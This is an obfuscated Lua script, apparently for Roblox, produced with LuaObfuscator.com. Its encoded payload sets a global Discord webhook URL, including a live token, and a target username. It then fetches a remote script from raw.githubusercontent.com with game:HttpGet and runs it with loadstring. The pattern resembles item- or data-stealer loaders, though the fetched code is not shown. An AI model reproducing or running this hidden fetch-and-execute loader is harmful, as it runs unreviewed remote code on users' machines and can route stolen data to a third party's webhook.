--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v94=v5(v84,v19);v19=nil;return v94;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -((2192 -(1523 + 114)) + 58 + 6)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=568 -(367 + 201) ;local v87;while true do if (v86==(927 -((1279 -(68 + 997)) + 713))) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and 1) or (877 -(282 + 595)) ;end end end end local function v21()local v34=957 -(892 + 65) ;local v35;while true do if (v34==1) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=4 -3 ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==1) then return (v38 * (436 -(67 + 113))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=351 -(87 + (1045 -782)) ;end end end local function v23()local v39=(1743 -(368 + 423)) -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * (45169940 -28392724)) + (v42 * (118879 -53343)) + (v41 * (187 + (216 -147))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + ((24 -(10 + 8)) -2) ;v39=2 -1 ;end end end local function v24()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (((33 -26) -5)==v44) then v49=v20(v46,463 -(416 + 26) ,98 -67 );v50=((v20(v46,14 + 8 + 10 )==(1 -0)) and  -(439 -(145 + 293))) or 1 ;v44=433 -(44 + 386) ;end if (v44==3) then if (v49==(1486 -(998 + 488))) then if (v48==((0 -0) + 0)) then return v50 * ((1747 -(760 + 987)) + 0) ;else local v104=772 -(201 + 571) ;while true do if (v104==(1138 -(116 + 1022))) then v49=4 -3 ;v47=0 + 0 ;break;end end end elseif (v49==2047) then return ((v48==(0 -0)) and (v50 * ((3 -(1915 -(1789 + 124)))/0))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/((768 -(745 + 21))^52))) ;end if (v44==(859 -(814 + 45))) then v45=v23();v46=v23();v44=2 -1 ;end if (v44==(1 + 0)) then v47=1 + 0 ;v48=(v20(v46,886 -(261 + 624) ,(13 + 22) -15 ) * ((1082 -(1020 + 60))^(1455 -(630 + 793)))) + v45 ;v44=6 -4 ;end end end local function v25(v51)local v52;if  not v51 then local v88=0 -0 ;while true do if ((1055 -((1500 -(447 + 966)) + 968))==v88) then v51=v23();if (v51==(0 -(0 -0))) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -(1 + (1817 -(1703 + 114))) );v18=v18 + v51 ;local v53={};for v68=2 -1 , #v52 do v53[v68]=v2(v1(v3(v52,v68,v68)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 -0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==3) then v61=nil;while true do local v95=0 + 0 ;local v96;while true do if (v95==0) then v96=0 + 0 ;while true do if (v96~=(1 + 0)) then else if (3~=v55) then else local v107=0;local v108;while true do if (v107~=(0 + 0)) then else v108=0 + 0 ;while true do if (v108==(529 -(406 + 123))) then local v162=0 -0 ;while true do if (v162~=(1661 -(1477 + 184))) then else for v168=1 -0 ,v23() do v57[v168-1 ]=v28();end return v59;end end end end break;end end end if (v55==(1770 -(1749 + 20))) then local v109=0 + 0 ;local v110;local v111;while true do if (v109~=0) then else v110=1322 -(1249 + 73) ;v111=nil;v109=1 + 0 ;end if (v109~=(2 -1)) then else while true do if (v110==0) then v111=0;while true do if (1==v111) then v61={};v55=2;break;end if (v111~=0) then else v59={v56,v57,nil,v58};v60=v23();v111=1;end end break;end end break;end end end break;end if (v96~=(476 -(41 + 435))) then else local v105=0 -0 ;local v106;while true do if (v105~=(0 -0)) then else v106=0 + 0 ;while true do if (v106~=(1900 -(106 + 1794))) then else local v149=0 + 0 ;while true do if ((1 + 0)~=v149) then else v106=1 + 0 ;break;end if (v149==(0 + 0)) then if (v55~=(1140 -(782 + 356))) then else local v166=0 -0 ;while true do if (v166~=(268 -(176 + 91))) then else for v174=2 -1 ,v23() do local v175=0 -0 ;local v176;local v177;local v178;while true do if ((114 -(4 + 110))~=v175) then else v176=584 -(57 + 527) ;v177=nil;v175=1428 -(41 + 1386) ;end if ((104 -(17 + 86))~=v175) then else v178=nil;while true do if (v176==(0 + 0)) then local v185=0 + 0 ;local v186;while true do if (v185==(0 -0)) then v186=0;while true do if (v186~=0) then else local v195=0 -0 ;while true do if (v195~=1) then else v186=167 -(122 + 44) ;break;end if (v195==(0 -0)) then v177=0;v178=nil;v195=3 -2 ;end end end if (v186==(1 + 0)) then v176=1;break;end end break;end end end if (v176==(1 + 0)) then while true do if (v177==(0 -0)) then v178=v21();if (v20(v178,66 -(30 + 35) ,1 + 0 )~=(1257 -(1043 + 214))) then else local v190=0 -0 ;local v191;local v192;local v193;local v194;while true do if ((7 -5)==v190) then while true do if (v191==(1213 -(323 + 889))) then local v197=1227 -(322 + 905) ;while true do if (v197~=1) then else v191=613 -(602 + 9) ;break;end if (v197~=(1189 -(449 + 740))) then else local v206=0 -0 ;while true do if ((581 -(361 + 219))==v206) then v197=321 -(53 + 267) ;break;end if (v206==(0 -0)) then v194={v22(),v22(),nil,nil};if (v192==0) then local v208=982 -(18 + 964) ;local v209;local v210;local v211;while true do if (v208~=0) then else v209=0 -0 ;v210=nil;v208=441 -(382 + 58) ;end if ((1 + 0)~=v208) then else v211=nil;while true do if (v209~=1) then else while true do if (v210==(0 + 0)) then v211=0 -0 ;while true do if (v211==0) then v194[8 -5 ]=v22();v194[854 -(20 + 830) ]=v22();break;end end break;end end break;end if (0==v209) then local v214=1205 -(902 + 303) ;while true do if ((0 + 0)~=v214) then else v210=0;v211=nil;v214=127 -(116 + 10) ;end if (v214~=1) then else v209=1 + 0 ;break;end end end end break;end end elseif (v192==(739 -(542 + 196))) then v194[3]=v23();elseif (v192==(1 + 1)) then v194[1693 -(1121 + 569) ]=v23() -((216 -(22 + 192))^(699 -(483 + 200))) ;elseif (v192~=3) then else local v215=0 -0 ;local v216;while true do if (0~=v215) then else v216=0 + 0 ;while true do if (v216~=(0 + 0)) then else v194[2 + 1 ]=v23() -((4 -2)^(40 -24)) ;v194[4 -0 ]=v22();break;end end break;end end end v206=766 -(468 + 297) ;end end end end end if (v191~=(1554 -(1126 + 425))) then else if (v20(v193,408 -(118 + 287) ,3)==1) then v194[15 -11 ]=v61[v194[4]];end v56[v174]=v194;break;end if (v191~=0) then else local v199=0 -0 ;while true do if (v199==1) then v191=1122 -(118 + 1003) ;break;end if (0~=v199) then else local v207=0 -0 ;while true do if (v207==(377 -(142 + 235))) then v192=v20(v178,9 -7 ,3);v193=v20(v178,4,6 + 0 );v207=1 + 0 ;end if (v207==(978 -(553 + 424))) then v199=1 -0 ;break;end end end end end if (v191~=(4 -2)) then else if (v20(v193,1 + 0 ,1)~=1) then else v194[2]=v61[v194[2 + 0 ]];end if (v20(v193,2 + 0 ,2 + 0 )==(1 -0)) then v194[2 + 1 ]=v61[v194[2 + 1 ]];end v191=3;end end break;end if (v190~=(2 -1)) then else v193=nil;v194=nil;v190=2;end if (v190~=(0 -0)) then else v191=0 -0 ;v192=nil;v190=1 + 0 ;end end end break;end end break;end end break;end end end v55=6 -3 ;break;end if (v166==(0 + 0)) then local v172=0 -0 ;while true do if ((754 -(239 + 514))~=v172) then else v166=1 + 0 ;break;end if (v172~=0) then else for v180=1,v60 do local v181=1329 -(797 + 532) ;local v182;local v183;local v184;while true do if (v181==0) then v182=0 -0 ;v183=nil;v181=1;end if ((1 + 0)~=v181) then else v184=nil;while true do if (v182==(1 -0)) then if (v183==(940 -(714 + 225))) then v184=v21()~=0 ;elseif (v183==(5 -3)) then v184=v24();elseif (v183==3) then v184=v25();end v61[v180]=v184;break;end if (v182==(0 + 0)) then local v188=0 + 0 ;local v189;while true do if ((0 -0)==v188) then v189=806 -(118 + 688) ;while true do if (v189~=(1203 -(373 + 829))) then else v182=732 -(476 + 255) ;break;end if (v189~=(1130 -(369 + 761))) then else local v196=0;while true do if (v196==(1 + 0)) then v189=1 + 0 ;break;end if (v196~=(1886 -(927 + 959))) then else v183=v21();v184=nil;v196=1 -0 ;end end end end break;end end end end break;end end end v59[5 -2 ]=v21();v172=239 -(64 + 174) ;end end end end end if (v55==(0 + 0)) then local v167=0 -0 ;while true do if (v167~=(336 -(144 + 192))) then else local v173=216 -(42 + 174) ;while true do if (v173==(0 + 0)) then v56={};v57={};v173=1;end if (v173==1) then v167=1 + 0 ;break;end end end if (v167==(286 -(175 + 110))) then v58={};v55=2 -1 ;break;end end end v149=1 + 0 ;end end end if (v106~=1) then else v96=1797 -(503 + 1293) ;break;end end break;end end end end break;end end end break;end if (v54==0) then local v91=1504 -(363 + 1141) ;while true do if (v91~=(0 -0)) then else v55=0;v56=nil;v91=1;end if (v91==(1581 -(1183 + 397))) then v54=1 + 0 ;break;end end end if (v54~=(2 -1)) then else local v92=0;while true do if (v92==(1061 -(810 + 251))) then v57=nil;v58=nil;v92=1;end if (v92~=(1 + 0)) then else v54=2 + 0 ;break;end end end if (2~=v54) then else local v93=0;while true do if (v93~=(0 + 0)) then else local v103=0 + 0 ;while true do if ((1976 -(1913 + 62))==v103) then v93=1;break;end if (v103==0) then v59=nil;v60=nil;v103=1;end end end if (v93~=(734 -(711 + 22))) then else v54=3;break;end end end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v90=0;while true do if (v90==0) then v82=v70[v74];v83=v82[1];v90=1;end if (v90==1) then if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83==0) then do return;end else v80[v82[2]]();end elseif (v83<=2) then local v112=0;local v113;local v114;while true do if (v112==1) then v80[v113 + 1 ]=v114;v80[v113]=v114[v82[4]];break;end if (v112==0) then v113=v82[2];v114=v80[v82[3]];v112=1;end end elseif (v83==3) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=7) then if (v83<=5) then local v115=0;local v116;while true do if (v115==0) then v116=v82[2];v80[v116]=v80[v116](v13(v80,v116 + 1 ,v75));break;end end elseif (v83==6) then v80[v82[2]]=v64[v82[3]];else v74=v82[3];end elseif (v83<=8) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>9) then v80[v82[2]]=v64[v82[3]];else do return;end end elseif (v83<=15) then if (v83<=12) then if (v83==11) then local v118=v82[2];v80[v118]=v80[v118](v13(v80,v118 + 1 ,v75));else v80[v82[2]][v82[3]]=v82[4];end elseif (v83<=13) then local v122=v82[2];local v123=v80[v82[3]];v80[v122 + 1 ]=v123;v80[v122]=v123[v82[4]];elseif (v83>14) then v74=v82[3];else local v137=v82[2];local v138,v139=v73(v80[v137](v13(v80,v137 + 1 ,v82[3])));v75=(v139 + v137) -1 ;local v140=0;for v157=v137,v75 do v140=v140 + 1 ;v80[v157]=v138[v140];end end elseif (v83<=18) then if (v83<=16) then v80[v82[2]]=v82[3];elseif (v83>17) then v80[v82[2]]=v82[3];else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=19) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==20) then local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==1) then v75=(v147 + v145) -1 ;v148=0;v144=2;end if (v144==0) then v145=v82[2];v146,v147=v73(v80[v145](v13(v80,v145 + 1 ,v82[3])));v144=1;end if (2==v144) then for v164=v145,v75 do local v165=0;while true do if (v165==0) then v148=v148 + 1 ;v80[v164]=v146[v148];break;end end end break;end end else v80[v82[2]]();end v74=v74 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132303635313839363038303833383732392F507476466368544C416F75316956716A68704E42673831784838546E41747754596A52376D684B526E65776C48326B2D2O72334E787570625472613552395F744B374F6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O006A736A73676A2O737768656803093O00557365724E616D653200173O0012103O00013O0026033O000E0001000200040F3O000E000100120A000100033O00301300010004000500120A000100063O00120A000200073O00200D000200020008001210000400094O0011000500014O0014000200054O000B00013O00022O001500010001000100040F3O001600010026033O00010001000100040F3O0001000100120A000100033O0030130001000A000B00120A000100033O0030130001000C000B0012103O00023O00040F3O000100012O00093O00017O00",v9(),...);end
